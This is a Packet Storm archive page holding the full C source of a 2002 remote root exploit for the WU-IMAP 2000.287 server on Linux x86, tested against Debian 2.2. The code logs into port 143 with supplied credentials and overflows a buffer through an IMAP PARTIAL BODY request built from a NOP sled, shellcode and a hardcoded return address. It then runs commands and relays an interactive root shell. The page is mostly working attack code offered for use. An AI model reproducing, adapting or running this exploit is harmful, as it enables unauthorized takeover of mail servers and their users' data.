exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

0x3a0x29wuim.c

0x3a0x29wuim.c
Posted Dec 24, 2002
Authored by Dekadish

WU-IMAP v2000.287 linux/x86 remote root exploit. Tested against Debian 2.2. This code is also known as 7350owex.c.

tags | exploit, remote, x86, root, imap
systems | linux, debian
SHA-256 | 8df95acb30e9f414b6310ecf9b306c5f2adc266657fe297676044ba7ca022888
Download | Favorite | View

0x3a0x29wuim.c

Change Mirror Download
/*
 * 0x3a0x29wuim.c - WU-IMAP 2000.287 (linux/i86) remote exploit
 *
 * dekadish
 *
 *  0x3a0x29 crew
 *
 */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

#define RETADDR 0x080eb395 /* My Debian 2.2 box */
#define MAILDIR "/var/spool/mail"

char shellcode[] =
 "\x55\x89\xe5\x55\x89\xe5\x83\xec\x28\xc6\x45\xd8\x2f\xc6\x45\xdc"
 "\x2f\xc6\x45\xd9\x5f\xc6\x45\xda\x5a\xc6\x45\xdb\x5f\xc6\x45\xdd"
 "\x5f\xc6\x45\xde\x5f\x83\x45\xd9\x03\x83\x45\xda\x0f\x83\x45\xdb"
 "\x0f\x83\x45\xdd\x14\x83\x45\xde\x09\x31\xc0\x89\x45\xdf\x89\x45"
 "\xf4\x8d\x45\xd8\x89\x45\xf0\x83\xec\x04\x8d\x45\xf0\x31\xd2\x89"
 "\xd3\x89\xc1\x8b\x45\xf0\x89\xc3\x31\xc0\x83\xc0\x0b\xcd\x80\x31"
 "\xc0\x40\xcd\x80";

int main(int argc, char *argv[])
{
  int s, i;
  fd_set fds;
  char tmp[2048], buf[1060];
  char *target, *login, *pass, *p;
  struct sockaddr_in sock;
  unsigned long retaddr;

  fprintf(stderr, "%s\n", "[The #smile Crew]");
  if (argc != 4)
  {
    fprintf(stderr, "Usage: %s <Target ip> <Login> <Password>\n", argv[0]);
    exit(-1);
  }

  retaddr = RETADDR;
  target  = argv[1];
  login   = argv[2];
  pass    = argv[3];

  s = socket(AF_INET, SOCK_STREAM, 0);
  sock.sin_port = htons(143);
  sock.sin_family = AF_INET;
  sock.sin_addr.s_addr = inet_addr(target);

  printf("\nConnecting to %s:143...", target);
  fflush(stdout);
  if ((connect(s, (struct sockaddr *)&sock, sizeof(sock))) < 0)
  {
    printf("failed\n");
    exit(-1);
  }
  else
    recv(s, tmp, sizeof(tmp), 0);

  printf("done\nLogging in...");
  fflush(stdout);
  snprintf(tmp, sizeof(tmp), "A0666 LOGIN %s %s\n", login, pass);
  send(s, tmp, strlen(tmp), 0);
  recv(s, tmp, sizeof(tmp), 0);

  if (!strstr(tmp, "completed"))
  {
    printf("failed\n");
    exit(-1);
  }

  printf("done\nExploiting...");
  fflush(stdout);

  dprintf(s, "A0666 SELECT %s/%s\n", MAILDIR, login);

  memset(buf, 0x0, sizeof(buf));
  p = buf;
  memset(p, 0x90, 928);
  p += 928;
  memcpy(p, shellcode, 100);
  p += 100;

  for (i=0; i<6; i++)
  {
    memcpy(p, &retaddr, 0x4);
    p += 0x4;
  }

  snprintf(tmp, sizeof(tmp), "A0666 PARTIAL 1 BODY[%s] 1 1\n", buf);
  send(s, tmp, strlen(tmp), 0);
  dprintf(s, "A0666 LOGOUT\n");
  sleep(5);
  printf("done\n\n");

  read(s, tmp, sizeof(tmp));
  dprintf(s, "uname -a;id;\n");
  memset(tmp, 0x0, sizeof(tmp));

  while (1)
  {
    FD_ZERO(&fds);
    FD_SET(s, &fds);
    FD_SET(1, &fds);

    select((s+1), &fds, 0, 0, 0);

    if (FD_ISSET(s, &fds))
    {
      if ((i = recv(s, tmp, sizeof(tmp), 0)) < 1)
      {
        fprintf(stderr, "Connection closed\n");
        exit(0);
      }
      write(0, tmp, i);
    }
    if (FD_ISSET(1, &fds))
    {
      i = read(1, tmp, sizeof(tmp));
      send(s, tmp, i, 0);
    }
  }

  return;
}
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close